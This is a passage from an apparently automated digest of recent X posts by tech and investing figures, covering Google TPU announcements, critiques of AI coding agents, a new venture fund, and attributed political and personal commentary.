dollars, and a huge loss in respect for the United States — all to accomplish nothing.\" https://ebx.sh/V5…\n[原文链接](https://x.com/ylecun/status/2048118689258487857)\n\n**[2026-04-25T16:01:07+00:00]**\n> RT by @ylecun: When MTV News shut down, it felt like decades of culture vanished overnight 🕳️ But over 470,000 pages were already preserved. That history didn’t disappear. It was archived. 📚 Read VAN…\n[原文链接](https://x.com/ylecun/status/2048069805807128734)\n\n**[2026-04-24T20:50:37+00:00]**\n> RT by @ylecun: Number of people who go bankrupt every year because of medical bills or illness-related work loss: 🇦🇺 0 🇨🇦 0 🇩🇰 0 🇫🇮 0 🇫🇷 0 🇩🇪 0 🇮🇸 0 🇮🇪 0 🇮🇹 0 🇯🇵 0 🇳🇱 0 🇳🇴 0 🇵🇹 0 🇪🇸 0 🇸🇪 0 🇬🇧 0 🇺🇸 53…\n[原文链接](https://x.com/ylecun/status/2047780272297382384)\n\n**[2026-04-24T19:31:52+00:00]**\n> RT by @ylecun: New episode of The Information Bottleneck is out, this time with @liuzhuang1234 (Princeton). We talked about ConvNeXt and whether architecture still matters; dataset bias and what \"goo…\n[原文链接](https://x.com/ylecun/status/2047760455679246500)\n\n**[2026-04-24T17:45:08+00:00]**\n> RT by @ylecun: The web is disappearing 🕳️ According to a Pew Research Center report, 26% of pages from 2013-2023 are no longer accessible. But that’s not the whole story. In a new study published in …\n[原文链接](https://x.com/ylecun/status/2047733594064408894)\n\n**[2026-04-24T15:23:18+00:00]**\n> RT by @ylecun: 图灵奖获得者、 AI 三大教父之一的 LeCun在达沃斯的发言,算是把整个硅谷的遮羞布扯了。 他说现在整个行业都被LLM彻底洗脑了,所有人都在同一条赛道上互相挖人,谁敢偏离主流谁就被骂落后。 这也是他离开Meta的真正原因,连Meta都已经LLM-pilled,他不想再跟风了。 最扎心的一句话是:纯生成式架构,不管是LLM、VLM还是VLA,永远造不出哪怕猫级的智能…\n[原文链接](https://x.com/ylecun/status/2047697898989572176)\n\n**[2026-04-24T14:14:06+00:00]**\n> RT by @ylecun: A mathematician who shared an office with Claude Shannon at Bell Labs gave one lecture in 1986 that explains why some people win Nobel Prizes and other equally smart people spend their…\n[原文链接](https://x.com/ylecun/status/2047680485208531152)\n\n**[2026-04-24T13:58:49+00:00]**\n> RT by @ylecun: Feel like very few serious people make the argument Britain should develop its own LLM? Certainly not an argument you see made in Westminster often during the sovereignty debate. Also …\n[原文链接](https://x.com/ylecun/status/2047676640059154653)\n\n**[2026-04-24T11:19:36+00:00]**\n> RT by @ylecun: 1. I never said LLMs were not useful. They are, particularly with all the bells and whistles that are being added to them. I use them. 2. A robot-rich future can't be built with AIs th…\n[原文链接](https://x.com/ylecun/status/2047636569767419951)\n\n**[2026-04-24T10:30:09+00:00]**\n> RT by @ylecun: 🎓 Register now for ML & Advanced Stats Summer School, an intensive set of courses on theoretical foundations & applications of ML methods & modern stats analysis techniques. With @ELLI…\n[原文链接](https://x.com/ylecun/status/2047624126047670758)\n\n**[2026-04-24T06:38:08+00:00]**\n> RT by @ylecun: 🔴 Trump vient de publier sur Truth Social un monologue de 1 500 mots sur le droit du sol, l'ACLU, les Indiens, les Chinois et la \"Savage Nation\". Ce texte inhabituellement long, inhabi…\n[原文链接](https://x.com/ylecun/status/2047565736382534091)\n\n**[2026-04-23T23:15:06+00:00]**\n> RT by @ylecun: Trump completely passed out, reawakened, then passed out again during today's pressor in the Oval Office. 😂🤣👇\n[原文链接](https://x.com/ylecun/status/2047454244781818205)\n\n**[2026-04-23T18:12:46+00:00]**\n> RT by @ylecun: This study is an important part of Vanishing Culture, the new book OUT TODAY from @internetarchive. 🕳️ Read for free or purchase in print ➡️ https://archive.org/details/vanishing-cultu…\n[原文链接](https://x.com/ylecun/status/2047378161860776085)\n\n**[2026-04-23T14:27:57+00:00]**\n> RT by @ylecun: The most dangerous thing in Washington right now isn't just the corruption—it's the retaliation against the people who expose it. When government power is used in ways that appear desi…\n[原文链接](https://x.com/ylecun/status/2047321581966291154)\n\n---\n\n### ✅ @JeffDean — Jeff Dean(12 条)\n\n**[2026-04-27T13:40:08+00:00]**\n> The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. https://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco Thanks for a great conversation!\n[原文链接](https://x.com/JeffDean/status/2048759102390899142)\n\n**[2026-04-26T10:41:25+00:00]**\n> RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯 Sabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!! He makes history as the…\n[原文链接](https://x.com/JeffDean/status/2048351736037826877)\n\n**[2026-04-24T13:12:52+00:00]**\n> R to @JeffDean: The Arxiv for the new Decoupled DiLoCo paper is now up: https://arxiv.org/abs/2604.21428v1\n[原文链接](https://x.com/JeffDean/status/2047665074471387456)\n\n**[2026-04-23T20:15:06+00:00]**\n> R to @JeffDean: It's worth pointing out that we have been pushing on large-scale training and asynchronous techniques for the last ~14 years. Here's our NeurIPS 2012 paper where we demonstrated that …\n[原文链接](https://x.com/JeffDean/status/2047408945950802186)\n\n**[2026-04-23T20:09:30+00:00]**\n> R to @JeffDean: TPU 8i is co-designed with our Gemini research team to support low latency inference. Among the attributes that support this are large amounts of on-chip SRAM, enabling more computati…\n[原文链接](https://x.com/JeffDean/status/2047407537566495033)\n\n**[2026-04-23T20:00:58+00:00]**\n> R to @JeffDean: First, let's talk about TPU 8t, which is designed for large-scale training and inference throughput. The pod size is increased slightly to 9600 chips, and provides ~3X the FP4 perform…\n[原文链接](https://x.com/JeffDean/status/2047405389856297387)\n\n**[2026-04-23T19:55:08+00:00]**\n> I had a good time discussing yesterday's Google TPU v8t and v8i announcement at Cloud Next with Amin Vahdat along with @AcquiredFM hosts @gilbert and @djrosent. The blog post announcement has lots of…\n[原文链接](https://x.com/JeffDean/status/2047403921912873257)\n\n**[2026-04-23T15:41:07+00:00]**\n> It's been a delight to provide small amounts of advice and suggestions to people working on the Decoupled DiLoCo training system. This approach enables graceful handling of failures in large scale tr…\n[原文链接](https://x.com/JeffDean/status/2047339995682529313)\n\n**[2026-04-21T19:31:28+00:00]**\n> RT by @JeffDean: My friend @JeffDean encouraged me to speak at this event so come join me on May 26 in San Jose! https://bauplanlabs.github.io/SAO-workshop/\n[原文链接](https://x.com/JeffDean/status/2046673188193701901)\n\n**[2026-04-21T17:02:26+00:00]**\n> RT by @JeffDean: The future of computer vision is agentic. 1/ We built Nomadic around a gap we kept seeing in video understanding: VLMs generate chain-of-thought that's fluent and often correct in st…\n[原文链接](https://x.com/JeffDean/status/2046635685206208533)\n\n**[2026-04-21T16:50:26+00:00]**\n> RT by @JeffDean: Following positive feedback from other venues, like STOC and ICML, NeurIPS is pleased to announce a new initiative in partnership with Google: for NeurIPS 2026, authors will have acc…\n[原文链接](https://x.com/JeffDean/status/2046632664493384060)\n\n**[2026-04-20T21:46:52+00:00]**\n> RT by @JeffDean: Read how Google built custom silicon and infrastructure - and how it's benefiting customers today - in the latest from @Bloomberg. We'll share more updates this week at #GoogleCloudN…\n[原文链接](https://x.com/JeffDean/status/2046344875994739028)\n\n---\n\n### ✅ @soumithchintala — Soumith Chintala(3 条)\n\n**[2026-04-27T13:29:14+00:00]**\n> This is kinda interesting. Anthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans. Alternatively, more and more…\n[原文链接](https://x.com/soumithchintala/status/2048756358820827564)\n\n**[2026-04-23T05:52:02+00:00]**\n> RT by @soumithchintala: Incredible work by Sony published in @Nature today! 🏓 They’ve built “Ace”, an autonomous ping-pong robot that uses RL and Sony’s vision sensors to achieve expert-level play in…\n[原文链接](https://x.com/soumithchintala/status/2047191747793649805)\n\n**[2026-04-20T17:40:46+00:00]**\n> RT by @soumithchintala: Dwarkesh is not an AGI party bro. He's been pretty diverse in how he seeks alpha from across a wide variety of industries. I enjoy the hell out of a lot of his podcasts. This …\n[原文链接](https://x.com/soumithchintala/status/2046282944139215141)\n\n---\n\n### ✅ @gregbrockman — Greg Brockman(0 条)\n\n---\n\n### ✅ @GaryMarcus — Gary Marcus(20 条)\n\n**[2026-04-27T15:50:31+00:00]**\n> If a major car company had AI fan boys and released a car with loose lug nuts and the wheels came off, after hyping it as the greatest thing ever, and a bunch of people died, those fan boys would say…\n[原文链接](https://x.com/GaryMarcus/status/2048791912149295182)\n\n**[2026-04-27T15:33:34+00:00]**\n> R to @GaryMarcus: that said, another tweet by the same user does correctly assess what’s wrong with most user’s model of what LLMs say.\n[原文链接](https://x.com/GaryMarcus/status/2048787646206677207)\n\n**[2026-04-27T15:31:37+00:00]**\n> This is totally wrong. Blaming the user is missing the point that (a) coding agents have been overhyped and (b) can’t reliably obey the rules given to them in system prompts and other guardrails.\n[原文链接](https://x.com/GaryMarcus/status/2048787157536653627)\n\n**[2026-04-27T14:27:36+00:00]**\n> yep, that’s what I do. I am increasingly concerned that people in China are soaking up my wisdom, while a lot of people in the US try to dismiss me. i don’t think that is going to end well.\n[原文链接](https://x.com/GaryMarcus/status/2048771044987777428)\n\n**[2026-04-27T13:32:43+00:00]**\n> ⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT about losing your dat…\n[原文链接](https://x.com/GaryMarcus/status/2048757233174122827)\n\n**[2026-04-27T12:48:41+00:00]**\n> R to @GaryMarcus: Stop blaming the users. It’s not that simple:\n[原文链接](https://x.com/GaryMarcus/status/2048746152749846549)\n\n**[2026-04-27T12:36:05+00:00]**\n> People keep blaming the users for the growing number of vibe-coded reasoners. Doing so is *half* right. Users *are*screwing up - by letting vibe coded stuff access their files, without proper backups…\n[原文链接](https://x.com/GaryMarcus/status/2048742983684784239)\n\n**[2026-04-27T12:20:17+00:00]**\n> “Vibe coded disasters piling up on Reddit”\n[原文链接](https://x.com/GaryMarcus/status/2048739005525877072)\n\n**[2026-04-27T03:39:49+00:00]**\n> RT by @GaryMarcus: The greatest con of the decade was calling autocomplete “AI”. The second greatest is calling autocomplete-in-a-loop an “agent”.\n[原文链接](https://x.com/GaryMarcus/status/2048608025464705084)\n\n**[2026-04-27T02:41:14+00:00]**\n> “Always keep a separate backup.” For sure, every experienced programmer should know this. 𝘉𝘶𝘵 𝘸𝘦 𝘫𝘶𝘴𝘵 𝘤𝘳𝘦𝘢𝘵𝘦𝘥 𝘢 𝘸𝘩𝘰𝘭𝘦 𝘨𝘦𝘯𝘦𝘳𝘢𝘵𝘪𝘰𝘯 𝘰𝘧 𝘷𝘪𝘣𝘦 𝘤𝘰𝘥𝘦𝘳𝘴 𝘸𝘩𝘰 𝘥𝘰𝘯’𝘵. And we now have a legion of synthetic coding…\n[原文链接](https://x.com/GaryMarcus/status/2048593283639894520)\n\n**[2026-04-27T02:25:10+00:00]**\n> RT by @GaryMarcus: “fails less often than a human does” is a terrible metric. We build deterministic software and test it to destruction to ensure it’s 99.99999 reliable . That’s been the basis of ev…\n[原文链接](https://x.com/GaryMarcus/status/2048589239915577837)\n\n**[2026-04-27T01:59:04+00:00]**\n> RT by @GaryMarcus: the beauty of a jagged frontier is that every failure is the user's fault and every breakthrough is the model's glory\n[原文链接](https://x.com/GaryMarcus/status/2048582672163995766)\n\n**[2026-04-27T01:48:56+00:00]**\n> RT by @GaryMarcus: I mean AI influencers here and everywhere are screaming you shouldn't get hired if you don't use agentic AI because you're deliberatly slowing everyone down and the moment somethin…\n[原文链接](https://x.com/GaryMarcus/status/2048580122521780676)\n\n**[2026-04-27T01:44:47+00:00]**\n> RT by @GaryMarcus: The only AGI that Sam Altman is after is Adjusted Gross Income.\n[原文链接](https://x.com/GaryMarcus/status/2048579079121555764)\n\n**[2026-04-27T01:40:43+00:00]**\n> the difference is that we don’t *hype* giving 12 year-olds bulldozers. *of course* it’s a kind of user error when a model destroys all of user’s data and they didn’t have a backup. that’s the point. …\n[原文链接](https://x.com/GaryMarcus/status/2048578055283880296)\n\n**[2026-04-27T01:09:02+00:00]**\n> RT by @GaryMarcus: Never ever use generative AI for anything critical. The technology is probablistic all the way down and therefore inherently unreliable. Why is this so hard to understand? It’s wil…\n[原文链接](https://x.com/GaryMarcus/status/2048570082843082905)\n\n**[2026-04-27T01:00:07+00:00]**\n> Generative AI as the Hindenberg\n[原文链接](https://x.com/GaryMarcus/status/2048567837221089669)\n\n**[2026-04-27T00:25:00+00:00]**\n> Is it me or X starting to look like a vibe coded mess? Polls are broken. Accounts are getting hacked. My DMs are full of phishing scams. Basics that used to work no longer work.\n[原文链接](https://x.com/GaryMarcus/status/2048558998325166498)\n\n**[2026-04-27T00:02:43+00:00]**\n> R to @GaryMarcus: btw polling software is broken! votes aren’t showing, as many folks have noted. eg I see none:\n[原文链接](https://x.com/GaryMarcus/status/2048553390540734479)\n\n**[2026-04-27T00:00:53+00:00]**\n> Total AI disaster, totally predictable\n[原文链接](https://x.com/GaryMarcus/status/2048552931923013916)\n\n---\n\n### ✅ @elonmusk — Elon Musk(19 条)\n\n**[2026-04-27T16:54:21+00:00]**\n> Calling him “Scam” Altman is accurate. This is very much worth reading.\n[原文链接](https://x.com/elonmusk/status/2048807976991850953)\n\n**[2026-04-27T16:39:59+00:00]**\n> RT by @elonmusk: Sam Altman cannot be trusted. • The OpenAI board fired him because he was not always honest with them. They said he should not control powerful AI. • A major report talked to over 10…\n[原文链接](https://x.com/elonmusk/status/2048804363595059425)\n\n**[2026-04-27T16:31:33+00:00]**\n> Exactly\n[原文链接](https://x.com/elonmusk/status/2048802239272169582)\n\n**[2026-04-27T16:30:27+00:00]**\n> Pinned: Scam Altman and Greg Stockman stole a charity. Full stop. Greg got tens of billions of stock for himself and Scam got dozens of OpenAI side deals with a piece of the action for himself, Y Com…\n[原文链接](https://x.com/elonmusk/status/2048801964457140540)\n\n**[2026-04-27T16:21:30+00:00]**\n> Scam Altman\n[原文链接](https://x.com/elonmusk/status/2048799712375902624)\n\n**[2026-04-27T15:56:52+00:00]**\n> RT by @elonmusk: From space to your phone, Starlink Mobile is now available to deliver data, voice, video, and messaging to @docomo customers in Japan 🛰️❤️📱\n[原文链接](https://x.com/elonmusk/status/2048793511701717143)\n\n**[2026-04-27T15:26:33+00:00]**\n> RT by @elonmusk: .@shaunmmaguire says Elon Musk’s X acquisition was in service of civilizational-scale missions. \"I truly believe, like in my soul, that he is trying to help humanity.\" \"He has these …\n[原文链接](https://x.com/elonmusk/status/2048785882950549854)\n\n**[2026-04-27T15:15:09+00:00]**\n> If extremely violent criminals are not imprisoned, eventually they will murder innocent people\n[原文链接](https://x.com/elonmusk/status/2048783014075777369)\n\n**[2026-04-27T14:53:45+00:00]**\n> Excellent point\n[原文链接](https://x.com/elonmusk/status/2048777628019032335)\n\n**[2026-04-27T12:50:55+00:00]**\n> RT by @elonmusk: Today marks the start of the Elon Musk v.Sam Altman trial. Two opposing worldviews. Sam Altman transformed a non-profit organization into one of the world's most profitable companies…\n[原文链接](https://x.com/elonmusk/status/2048746715805581608)\n\n**[2026-04-27T12:40:59+00:00]**\n> RT by @elonmusk: 🚨 NEWS: Emirates upgrades its iconic A380 with Starlink high-speed Wi-Fi, delivering “better-than-home” internet at 40,000 feet. • Up to 3 Starlink antennas on each A380 for massive …\n[原文链接](https://x.com/elonmusk/status/2048744214230712500)\n\n**[2026-04-27T11:35:33+00:00]**\n> RT by @elonmusk: This is the 7th consecutive week with new reporting that ChatGPT was used in connection with murder or suicide. OpenAI doesn’t “benefit all of humanity.”\n[原文链接](https://x.com/elonmusk/status/2048727747954868342)\n\n**[2026-04-27T11:08:22+00:00]**\n> RT by @elonmusk: They arrested the President of the United States of America 4X, charged him 91X, indicted him 4X, spied on his campaign, sabotaged his first term, jailed his supporters, raided his p…\n[原文链接](https://x.com/elonmusk/status/2048720909809156378)\n\n**[2026-04-27T03:11:45+00:00]**\n> Grok Imagine\n[原文链接](https://x.com/elonmusk/status/2048600964102246438)\n\n**[2026-04-27T02:26:57+00:00]**\n> Curiosity & adventure are my philosophy https://grok.com/share/bGVnYWN5_d70e0164-cced-4096-99cb-38604067aa7a\n[原文链接](https://x.com/elonmusk/status/2048589691054694406)\n\n**[2026-04-26T23:22:48+00:00]**\n> Remember this\n[原文链接](https://x.com/elonmusk/status/2048543344746250466)\n\n**[2026-04-26T22:50:49+00:00]**\n> Grad school indoctrination camps\n[原文链接](https://x.com/elonmusk/status/2048535299102265720)\n\n**[2026-04-26T21:21:33+00:00]**\n> RT by @elonmusk: 🚨BREAKING: I found Cole Allen's archived tweets. He predicted \"Kamala wins all swing states,\" compared Trump's win to “Nazis getting elected,” and moved to Bluesky. The scary part: h…\n[原文链接](https://x.com/elonmusk/status/2048512831692452091)\n\n**[2026-04-26T16:14:38+00:00]**\n> RT by @elonmusk: 25% of very liberal people say political violence can “sometimes be justified.” Among very conservative people it’s just 3%. In other words, the far left is 8x more likely to support…\n[原文链接](https://x.com/elonmusk/status/2048435593244237849)\n\n---\n\n### ✅ @paulg — Paul Graham(20 条)\n\n**[2026-04-27T10:01:28+00:00]**\n> One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago.\n[原文链接](https://x.com/paulg/status/2048704073356935676)\n\n**[2026-04-27T09:50:40+00:00]**\n> You never need to describe something as a \"bad take.\" If it's false or irrelevant or omits something important, you can just say so. And if it's true, relevant, and complete, it's not a bad take.\n[原文链接](https://x.com/paulg/status/2048701354672050286)\n\n**[2026-04-27T08:17:48+00:00]**\n> Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.\n[原文链接](https://x.com/paulg/status/2048677984106664227)\n\n**[2026-04-27T04:08:42+00:00]**\n> RT by @paulg: Whenever I go to Paris to talk about investing in YC startups, I'm always amazed how much the French just LOVE Y Combinator. Nous t'aimons aussi, France. My French friend of @Fundoraclu…\n[原文链接](https://x.com/paulg/status/2048615296613937201)\n\n**[2026-04-26T14:48:06+00:00]**\n> RT by @paulg: Yeah okay, Lego bros, brodettes and brotheys are cooked with this one. GPT 2 Image can create full Lego sets! With actual Bricklink IDs so you can order the parts and build it. Whole ne…\n[原文链接](https://x.com/paulg/status/2048413815675539816)\n\n**[2026-04-26T14:47:09+00:00]**\n> Every post, I block and report a couple accounts using AI-generated replies. It feels much the same as picking up litter on a city street; I don't know if it has any effect, but it feels like I ought…\n[原文链接](https://x.com/paulg/status/2048413578789634100)\n\n**[2026-04-26T14:40:28+00:00]**\n> Durer was the original Dr Seuss.\n[原文链接](https://x.com/paulg/status/2048411898081583547)\n\n**[2026-04-26T14:36:59+00:00]**\n> Writing a talk to give in Stockholm. The prospect of speaking to a large group of people is no longer frightening, but writing a talk is as much work as ever. I'm no longer afraid of audiences, but I…\n[原文链接](https://x.com/paulg/status/2048411021329453562)\n\n**[2026-04-26T13:37:21+00:00]**\n> RT by @paulg: 'Action is now needed': Over 60 ex-U.K. ambassadors call to sanction Israel over West Bank https://www.haaretz.com/west-bank/2026-04-26/ty-article/.premium/over-60-ex-uk-ambassadors-cal…\n[原文链接](https://x.com/paulg/status/2048396013816152216)\n\n**[2026-04-26T11:57:10+00:00]**\n> Good use of camouflage by Biscuit.\n[原文链接](https://x.com/paulg/status/2048370801833828507)\n\n**[2026-04-25T14:17:57+00:00]**\n> RT by @paulg: Journalists worldwide should stand up for colleagues who are murdered.\n[原文链接](https://x.com/paulg/status/2048043843690561556)\n\n**[2026-04-25T13:02:57+00:00]**\n> Edith and Shahed from Noora Health came to visit. They've saved over 75,000 lives so far. A small city of people.\n[原文链接](https://x.com/paulg/status/2048024967996993760)\n\n**[2026-04-25T12:34:34+00:00]**\n> RT by @paulg: Here's YC's official advice about being truthful and precise about what is pilot, bookings, revenue and recurring revenue. Founders, particularly first time founders, need to sear this …\n[原文链接](https://x.com/paulg/status/2048017824895909901)\n\n**[2026-04-25T12:32:40+00:00]**\n> Whoah, self-driving cars compete with airlines. I never considered that till now.\n[原文链接](https://x.com/paulg/status/2048017345000415744)\n\n**[2026-04-25T10:55:23+00:00]**\n> RT by @paulg: 23 years old with no advanced mathematics training solves Erdős problem with ChatGPT Pro. \"What’s beginning to emerge is that the problem was maybe easier than expected, and it was like…\n[原文链接](https://x.com/paulg/status/2047992864118894954)\n\n**[2026-04-25T08:33:48+00:00]**\n> RT by @paulg: GitHub outages since Microsoft acquisition 🤣\n[原文链接](https://x.com/paulg/status/2047957234664030380)\n\n**[2026-04-25T07:44:30+00:00]**\n> Hamming's talk is so important that I reproduced it on my site. It's one of the only things on my site written by someone else. https://paulgraham.com/hamming.html\n[原文链接](https://x.com/paulg/status/2047944827887591681)\n\n**[2026-04-25T07:35:28+00:00]**\n> R to @paulg: Auction houses could fix this by giving you timegrapher numbers. But the only auction house that does this so far is a small Swiss one that specializes in watches (Ineichen). None of the…\n[原文链接](https://x.com/paulg/status/2047942555254288757)\n\n**[2026-04-25T07:30:15+00:00]**\n> The best way to buy art is at auction, once you know what you're doing. But old watches you should buy from dealers. You can get enough information about paintings to judge their condition, but you h…\n[原文链接](https://x.com/paulg/status/2047941243234107691)\n\n**[2026-04-24T19:36:00+00:00]**\n> RT by @paulg: BREAKING: A Syrian billionaire needed U.S. sanctions lifted so he could cash in on $12 billion in reconstruction contracts, per NYT. In an attempt to influence American foreign policy, …\n[原文链接](https://x.com/paulg/status/2047761493274571036)\n\n---\n\n### ✅ @naval — Naval Ravikant(11 条)\n\n**[2026-04-24T11:53:43+00:00]**\n> RT by @naval: Fundrise VCX is exactly why USVC needs to exist. Retail wants access to OpenAI, Anthropic, SpaceX, xAI, etc. That demand is not going away. VCX turned that demand into a liquid public w…\n[原文链接](https://x.com/naval/status/2047645157080658335)\n\n**[2026-04-24T05:39:10+00:00]**\n> R to @naval: x.com/avlok/status/204754692…\n[原文链接](https://x.com/naval/status/2047550896670908809)\n\n**[2026-04-24T05:23:22+00:00]**\n> RT by @naval: I’ve seen a lot of questions about USVC, AngelList’s newest product. First, don’t invest in venture capital if you can’t afford to lose your money. Put your savings somewhere safer. But…\n[原文链接](https://x.com/naval/status/2047546920747307466)\n\n**[2026-04-24T03:37:14+00:00]**\n> Hari nails it: “Don’t listen to people who don’t know how private markets work.”\n[原文链接](https://x.com/naval/status/2047520212787015748)\n\n**[2026-04-24T03:33:25+00:00]**\n> R to @naval: x.com/haridigresses/status/2…\n[原文链接](https://x.com/naval/status/2047519250433421604)\n\n**[2026-04-24T02:58:19+00:00]**\n> R to @naval: x.com/nivi/status/2047471220…\n[原文链接](https://x.com/naval/status/2047510419565420779)\n\n**[2026-04-24T01:01:28+00:00]**\n> RT by @naval: USVC is a new fund being offered by Naval, it's been discussed widely on X. I have some thoughts and why people should look into it. I have no connection with it and not being paid to s…\n[原文链接](https://x.com/naval/status/2047481012826124516)\n\n**[2026-04-24T00:22:33+00:00]**\n> RT by @naval: I spent the morning digging into USVC fees. TLDR: In my opinion, there is no lower-cost way to invest in VC other than becoming one. I’m expecting to pay the same or less than it costs …\n[原文链接](https://x.com/naval/status/2047471220451578132)\n\n**[2026-04-23T15:20:52+00:00]**\n> RT by @naval: We launched USVC yesterday and it was one of the most fun days of my career Thousands of people ended up subscribing for literally tens of millions of dollars While most of the receptio…\n[原文链接](https://x.com/naval/status/2047334901033123913)\n\n**[2026-04-22T16:34:52+00:00]**\n> Introducing USVC - a single basket of high-growth venture capital, for everyone. No accreditation required, SEC-registered, and a very low $500 minimum. Includes OpenAI, Anthropic, xAI, Sierra, Cruso…\n[原文链接](https://x.com/naval/status/2046991137022648800)\n\n**[2026-04-22T14:36:51+00:00]**\n> RT by @naval: Announcing my new thing: I'm launching a new public venture fund USVC is built by AngelList with @naval shaping our investment strategy in the technology companies building our future A…\n[原文链接](https://x.com/naval/status/2046961436593713241)\n\n---\n\n### ✅ @pmarca — Marc Andreessen(20 条)\n\n**[2026-04-27T08:14:21+00:00]**\n> 😳\n[原文链接](https://x.com/pmarca/status/2048677114480873657)\n\n**[2026-04-27T08:07:29+00:00]**\n> cc @BrendanEich\n[原文链接](https://x.com/pmarca/status/2048675385119019444)\n\n**[2026-04-27T08:04:13+00:00]**\n> 👀\n[原文链接](https://x.com/pmarca/status/2048674564314685477)\n\n**[2026-04-27T08:01:44+00:00]**\n> But \"A Disservice To Those Who Are Watching\" is the name of this show!\n[原文链接](https://x.com/pmarca/status/2048673940072251670)\n\n**[2026-04-27T07:59:56+00:00]**\n> cc @elonmusk\n[原文链接](https://x.com/pmarca/status/2048673488383447437)\n\n**[2026-04-27T04:43:41+00:00]**\n> When one thing becomes abundant and cheap, another thing becomes scarce and valuable.\n[原文链接](https://x.com/pmarca/status/2048624098398650608)\n\n**[2026-04-27T04:32:43+00:00]**\n> Overheard in Silicon Valley: \"Imagine if he heard how the world really worked. Wonder what manifesto would say then.\"\n[原文链接](https://x.com/pmarca/status/2048621340408844368)\n\n**[2026-04-27T04:29:26+00:00]**\n> Image\n[原文链接](https://x.com/pmarca/status/2048620511912194339)\n\n**[2026-04-27T04:10:44+00:00]**\n> The apps can rewrite the files. 👀\n[原文链接](https://x.com/pmarca/status/2048615807190769738)\n\n**[2026-04-27T04:07:00+00:00]**\n> Many such cases.\n[原文链接](https://x.com/pmarca/status/2048614869352714619)\n\n**[2026-04-27T04:06:10+00:00]**\n> 🇺🇸\n[原文链接](https://x.com/pmarca/status/2048614659595583651)\n\n**[2026-04-27T04:04:46+00:00]**\n> Many such cases (in the universe).\n[原文链接](https://x.com/pmarca/status/2048614305705386433)\n\n**[2026-04-27T03:56:11+00:00]**\n> Concerning.\n[原文链接](https://x.com/pmarca/status/2048612144871264609)\n\n**[2026-04-27T03:49:14+00:00]**\n> Self recommending!\n[原文链接](https://x.com/pmarca/status/2048610397243265189)\n\n**[2026-04-27T03:01:18+00:00]**\n> Self recommending recommending.\n[原文链接](https://x.com/pmarca/status/2048598334492033455)\n\n**[2026-04-27T02:57:11+00:00]**\n> 👀\n[原文链接](https://x.com/pmarca/status/2048597298150875169)\n\n**[2026-04-27T02:34:50+00:00]**\n> 👀\n[原文链接](https://x.com/pmarca/status/2048591674688037210)\n\n**[2026-04-27T02:25:08+00:00]**\n> Overheard in Silicon Valley: \"Did a Claw post this?\"\n[原文链接](https://x.com/pmarca/status/2048589233095643240)\n\n**[2026-04-27T01:20:46+00:00]**\n> Overheard in Silicon Valley: \"Now, software is just the prompt for the next version of the software.\"\n[原文链接](https://x.com/pmarca/status/2048573035616375134)\n\n**[2026-04-26T21:32:43+00:00]**\n> Many such cases.\n[原文链接](https://x.com/pmarca/status/2048515643268567431)\n\n---\n\n### ✅ @david_tiantian — David Tian Wang(0 条)\n\n---\n\n### ✅ @morganhousel — Morgan Housel(2 条)\n\n**[2026-04-22T18:05:41+00:00]**\n> \"Self-control is empathy with your future self.\" - Seinfeld\n[原文链接](https://x.com/morganhousel/status/2047013991046881663)\n\n**[2026-04-21T03:24:00+00:00]**\n> RT by @morganhousel: I’m in love with this sentence: “The best math you can learn is how to calculate the future cost of current decisions.”\n[原文链接](https://x.com/morganhousel/status/2046429717834654025)\n\n---\n\n### ✅ @eladgil — Elad Gil(20 条)\n\n**[2026-04-26T02:40:47+00:00]**\n> Saturday song https://youtu.be/D8MoLNxLE98?si=yRsm9viuy3NYvnJ0\n[原文链接](https://x.com/eladgil/status/2048230781739581745)\n\n**[2026-04-24T18:44:49+00:00]**\n> RT by @eladgil: Adopting Claude speak in my regular life, episode 1: Partner: Did you do the dishes tonight? Me: Yes they're done. Partner: Why are they still dirty? Me: You're right to push back. I …\n[原文链接](https://x.com/eladgil/status/2047748613976264835)\n\n**[2026-04-24T01:35:02+00:00]**\n> New life plan- Move to Brooklyn Get neck tat Ride bike everywhere Cold brew own coffee (also start drinking coffee) Adopt 12 year old stray cat, name him Nietzsche Vape mango pods, but ironically Wea…\n[原文链接](https://x.com/eladgil/status/2047489459378397604)\n\n**[2026-04-23T21:04:47+00:00]**\n> RT by @eladgil: How does one make sense of SF? We are living through the craziest computing revolution of the last 2 decades....and 95% of the value being created is within a 4-mile radius in SF (h/t…\n[原文链接](https://x.com/eladgil/status/2047421448449630379)\n\n**[2026-04-23T17:55:03+00:00]**\n> Entrepreneurship is a distributed search job across the surface of commercial opportunities\n[原文链接](https://x.com/eladgil/status/2047373700643844303)\n\n**[2026-04-23T17:20:32+00:00]**\n> Big congrats\n[原文链接](https://x.com/eladgil/status/2047365014500389353)\n\n**[2026-04-23T17:19:56+00:00]**\n> My view is the AI boom will only accelerate and is a once in a lifetime transformation This is orthogonal to whether many AI companies should exit in next 12-18 months, as some may lack durability vs…\n[原文链接](https://x.com/eladgil/status/2047364865527075139)\n\n**[2026-04-22T20:39:39+00:00]**\n> <3 @infisical\n[原文链接](https://x.com/eladgil/status/2047052737762980083)\n\n**[2026-04-21T22:45:48+00:00]**\n> What a time to be alive\n[原文链接](https://x.com/eladgil/status/2046722094348771758)\n\n**[2026-04-21T20:58:54+00:00]**\n> 👀\n[原文链接](https://x.com/eladgil/status/2046695194054320150)\n\n**[2026-04-21T19:36:05+00:00]**\n> The dark alchemy that is loonen sparkling + salt of the earth electrolytes 😱\n[原文链接](https://x.com/eladgil/status/2046674350993223784)\n\n**[2026-04-21T17:21:44+00:00]**\n> AI for email++\n[原文链接](https://x.com/eladgil/status/2046640542218604783)\n\n**[2026-04-20T23:50:03+00:00]**\n> 🔥\n[原文链接](https://x.com/eladgil/status/2046375878368940239)\n\n**[2026-04-20T18:51:07+00:00]**\n> R to @eladgil: Link to fuller post: https://substack.com/home/post/p-194229552?source=queue\n[原文链接](https://x.com/eladgil/status/2046300649483374704)\n\n**[2026-04-20T17:46:29+00:00]**\n> Here is the sbstack version \"Random thoughts while gazing at the misty AI Frontier\" 